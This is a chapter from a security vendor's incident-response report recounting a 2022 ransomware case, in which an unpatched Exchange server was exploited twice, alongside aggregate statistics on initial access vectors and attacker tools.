(*Text on gray background describes events from a specific case investigated by CPIRT in 2022. Other text includes observations and data referring to all cases handled in 2022.
Certain details have been modified to ensure customer confidentiality)
On a Monday morning in March 2022, the Check Point Incident Response Team (CPIRT) received a call from a medium-sized European technology company which had been the victim of a Quantum Locker ransomware attack deployed early in the morning the day before. Robert, the company’s CISO, was on the line. Thus began a typical workday in the life of an IR analyst, which is often one of the worst days of the customers’ (professional) life.*
Unlike the analysis and trends discussed in previous chapters of this report, which are based on Check Point products’ anonymized data collected during routine preventative protection, this chapter offers the perspective of the Check Point Incident Response Team who provide attack mitigation services in response to various types of active breaches, and not specific to Check Point customers.
Robert reported that most of their data center servers, including the Domain Controllers and File Servers, had been encrypted and rendered non-functional. With no backups, their entire operation came to a halt and they were in need of assistance to investigate and mitigate this attack. CPIRT’s mission was to look for ongoing vulnerabilities and malicious activity, resume network functionality, and perform root cause analysis to identify the initial attack vector and prevent future attacks.
CPIRT involvement usually follows the discovery of visible malicious activity, such as encrypted files (ransomware), detection of spoofed or forged emails (email compromise), or the presence of malware files or unknown processes on a computer system. CPIRT’s breakdown of the initial threat indication provides a different perspective of the threat landscape than the one routinely provided by our product data.
Analysis of the initial threat indications as seen by CPIRT in 2022 indicates that almost 50% of investigations involve ransomware infections. The threat breakdown above is different from what we see in our product data, which places multipurpose malware and infostealers at the top of the threat list. However, CPIRT data shows that the biggest risks that are visible from a large corporate perspective - are full-blown ransomware attacks and full network compromises. Product telemetry that records multipurpose malware activity often just shows the initial incursion which if prevented, blocks much larger damage.
After the initial CPIRT forensic investigation, it became clear that the entry point to the organization was the company’s exchange server. The server had not been patched and was vulnerable to two very popular exploits used by threat actors since 2021: the same group of vulnerabilities used by Hafnium (CVE-2021-26855 and CVE-2021-26855, CVE-2021-26857 or CVE-2021-26858) and the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
In almost half of CPIRT cases, the initial foothold is achieved by exploiting a vulnerable server with an unpatched RCE vulnerability and open ports to the internet. In fact, ProxyShell vulnerabilities specifically were the cause of one in every six incidents CPIRT investigated in 2022, despite those vulnerabilities being disclosed and patched in 2021.
An exposed RDP service is often used by attackers in combination with an RCE vulnerability or password attacks such as brute force or credential stuffing attack to gain a foothold in the network. Mail servers are often the weak link in a network and are a common initial entry point for attackers and more easily encrypted. That is because, due to performance considerations, endpoint security and anti-ransomware products are frequently not installed on servers. Combined with the high number of vulnerabilities, network exposure and poor patch management, in many organizations, it’s the servers and not the peripheral endpoints that are the weakest point and are therefore exploited in many attacks.
Further analysis revealed that the same vulnerable Exchange server had been exploited twice, in incidents nine months apart. The first exploitation of the server occurred in June 2021. Initially, “only” a cryptominer was installed, utilizing multiple assets across the network.
This emphasizes the need to treat every breach as seriously as a full-blown ransomware attack. As in this case, cryptominers and other “minor” malware types are often initial indicators of possible exploitation that could lead to cyber disasters later on.
Persistence in this attack was achieved by changing a registry key to periodically connect and download an external resource. Initially, this was a cryptominer installed on dozens of machines, but the resource could easily have been changed to another payload. By the end of the initial attack in mid-2021, the attackers leaked a list of network assets in the network, and used Mimikatz to harvest credentials from the infected network. Some of the harvested passwords were NTLM hashes which, due to the practice of simple passwords, were easily reverse-engineered to the plain text version.
CPIRT case statistics reveal extensive utilization by attackers of non-signature tools. The top tools used this year were Cobalt Strike and Mimikatz. However, for the first time, the third most popular tool in this list, AnyDesk, is a legitimate admin tool. As threat actors have started using more legitimate admin tools in their attacks, the use of customized malware built by the same threat actors has declined, and we are seeing an increase in attacks that might not include any malware at all.
This shift in the tools deployed by attackers is detailed in a dedicated chapter in this report
During the second breach in March 2022, the attackers used the data retrieved nine months earlier. The asset list and credential dump stolen during the first attack were now used to enable and direct the ransomware deployment.
Stolen credentials and initial access to corporate networks are now often traded between threat actors or sold by “initial access brokers”. The outsourcing of more and more parts of the attack process, and the further fragmentation of the threat landscape, complicates attribution efforts. For these reasons, in many of CPIRT cases in 2022, the attack attribution was not to a very well-known or common threat group. We have also seen multiple malware families used in a single attack, for example, the use of IceID to deliver RansomEXX.
While the first attack went relatively unnoticed, the second attack resulted in the encryption of critical servers and ensuing serious damage. But there is a happy ending: at the end of a long, nerve-wracking process, thanks to CPIRT assistance, Robert was able to recover his company’s data and resume normal business activity.
This case is one of many dozens handled by CPIRT in 2022 that emphasizes the critical importance of the following:
As Robert can attest, these actions prevent corporate catastrophes.